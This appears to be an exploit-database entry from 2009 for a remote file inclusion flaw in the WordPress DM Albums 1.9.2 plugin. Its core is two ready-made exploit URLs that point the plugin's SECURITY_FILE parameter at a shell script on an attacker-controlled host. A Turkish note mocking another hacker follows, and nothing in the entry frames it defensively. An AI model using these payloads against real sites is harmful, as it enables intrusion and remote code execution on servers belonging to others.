WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln

2009-06-29T00:00:00
ID 1337DAY-ID-5432
Type zdt
Reporter Septemb0x
Modified 2009-06-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln
===========================================================


#############################################################################################
[+] DM Albumsâ„¢ 1.9.2 & WordPress Plug-in Remote File Include Vulnerability
[+] Author : Septemb0x
[+] Dork : Yok Dork Mork :D
[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] NORMAL EXPLOIT;
[+] http://[sitename]/[path]/template/album.php?SECURITY_FILE=http://attackersite/shell.php
[+] WORDPRESS EXPLOIT
[+] http://[sitename]/[path]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
#############################################################################################
< ---- Note ---- >
H....R;
Sen cok ustun zekaya sahip birisin,
emin olbilirsin, :D
Sql injection ile domain hackleyebilen tek lamersin, :D
ASP'de Rfi Bulmakta Birebirsin,
Ama Gordugum En h?yar Lamersin :D
Bu Kafiyelerde Bi Taraf?na Girsin ;)
Lol H....R :D
< ---- Note Finished ---- >



#  0day.today [2018-04-09]  #